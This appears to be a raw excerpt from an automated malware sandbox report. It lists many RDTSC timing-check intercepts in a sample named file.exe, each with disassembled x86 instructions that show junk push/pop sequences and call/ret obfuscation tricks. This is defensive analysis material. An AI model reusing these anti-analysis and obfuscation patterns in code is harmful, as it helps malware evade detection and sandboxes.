Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0418 second address: EC0484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 269862DEh 0x0000000e jmp 00007F4178B56578h 0x00000013 lea ebx, dword ptr [ebp+124521FEh] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F4178B56568h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jmp 00007F4178B5656Ah 0x00000038 mov ecx, dword ptr [ebp+122D2303h] 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4178B5656Bh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0484 second address: EC04A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F417883CDDAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC04A7 second address: EC04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0526 second address: EC05B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5DC54728h 0x00000010 mov dword ptr [ebp+122D2090h], edx 0x00000016 push 00000003h 0x00000018 pushad 0x00000019 and edx, dword ptr [ebp+122D21FDh] 0x0000001f pushad 0x00000020 push edx 0x00000021 pop edx 0x00000022 mov esi, edx 0x00000024 popad 0x00000025 popad 0x00000026 push 00000000h 0x00000028 mov di, dx 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F417883CDC8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 jmp 00007F417883CDCEh 0x0000004c adc edi, 5ED00E51h 0x00000052 je 00007F417883CDCAh 0x00000058 mov cx, 1275h 0x0000005c push 917EE9C9h 0x00000061 push eax 0x00000062 push edx 0x00000063 jnl 00007F417883CDC8h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC05B4 second address: EC05CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56577h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC05CF second address: EC0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 517EE9C9h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F417883CDC8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+12452207h] 0x0000002f mov edi, dword ptr [ebp+122D3929h] 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jng 00007F417883CDCCh 0x0000003e jnp 00007F417883CDC6h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0618 second address: EC0640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4178B56570h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0640 second address: EC0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0735 second address: EC0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0739 second address: EC073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC073F second address: EC0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0745 second address: EC076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f ja 00007F417883CDD0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC076F second address: EC077D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC077D second address: EC0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0784 second address: EC0799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007F4178B56574h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0799 second address: EC079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41A65 second address: D41A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9ACC second address: EA9AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF1D5 second address: EDF1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56575h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF1EE second address: EDF1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF485 second address: EDF48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF48B second address: EDF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF61D second address: EDF625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF625 second address: EDF639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F417883CDC6h 0x0000000a jmp 00007F417883CDCAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF90A second address: EDF91E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF91E second address: EDF930 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F417883CDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF930 second address: EDF947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4178B56566h 0x0000000a popad 0x0000000b jns 00007F4178B5656Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD27 second address: EDFD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD31 second address: EDFD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4178B56566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD3C second address: EDFD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD4h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007F417883CDC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD5D second address: EDFD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4178B56566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jc 00007F4178B56566h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE02FD second address: EE030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE030C second address: EE0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0310 second address: EE0314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0468 second address: EE048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56571h 0x00000009 popad 0x0000000a jmp 00007F4178B5656Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE048C second address: EE0498 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0498 second address: EE049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0751 second address: EE075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3003 second address: EE3009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6599 second address: EE659D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA7F5C second address: EA7F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEEB4D second address: EEEB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F417883CDC6h 0x0000000a pop esi 0x0000000b jmp 00007F417883CDD9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEED6D second address: EEED8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 jc 00007F4178B56584h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F4178B56570h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0DD4 second address: EF0DD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14CF second address: EF14E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4178B5656Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF165A second address: EF1660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1743 second address: EF1747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF196B second address: EF1979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F417883CDC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1979 second address: EF197D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF197D second address: EF1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F417883CDD2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1AFB second address: EF1B10 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B10 second address: EF1B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B14 second address: EF1B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4178B5656Ch 0x0000000c jns 00007F4178B56566h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F4178B56568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 jbe 00007F4178B56566h 0x00000038 pop edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B53 second address: EF1B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B59 second address: EF1B67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2AC1 second address: EF2AC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3BDF second address: EF3BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF450C second address: EF4527 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F417883CDCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F417883CDC8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF42E0 second address: EF42F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF42F2 second address: EF42F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF45D4 second address: EF45D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF678A second address: EF6790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7391 second address: EF7396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7396 second address: EF73AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jp 00007F417883CDC6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF73AC second address: EF73B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7E8B second address: EF7E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F46 second address: EF9F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869A second address: EF869E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F4A second address: EF9F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F50 second address: EF9F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F417883CDC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F417883CDC6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEA4 second address: EFBEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEAA second address: EFBEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEAF second address: EFBEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEB4 second address: EFBEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04C2 second address: EB04D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F4178B56566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04D0 second address: EB04E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04E5 second address: EB0507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push esi 0x00000008 jne 00007F4178B56572h 0x0000000e jo 00007F4178B5656Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEFEC second address: EFEFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF5C4 second address: EFF5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF5D1 second address: EFF5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF684 second address: EFF691 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0060E second address: F00612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0160B second address: F01652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F4178B56568h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dword ptr [ebp+122DB72Ch], edi 0x00000029 push 00000000h 0x0000002b add dword ptr [ebp+122D2727h], esi 0x00000031 push eax 0x00000032 pushad 0x00000033 ja 00007F4178B56568h 0x00000039 push eax 0x0000003a push edx 0x0000003b jp 00007F4178B56566h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F007FE second address: F00802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00802 second address: F00808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00808 second address: F0080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02591 second address: F025B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56570h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F025B1 second address: F025B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0365F second address: F036E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F4178B56568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 pushad 0x00000025 mov ch, 86h 0x00000027 jmp 00007F4178B56579h 0x0000002c popad 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F4178B56568h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push 00000000h 0x0000004b or edi, dword ptr [ebp+122D391Dh] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F4178B56574h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04512 second address: F04532 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F417883CDD1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F417883CDC8h 0x00000013 rdtsc
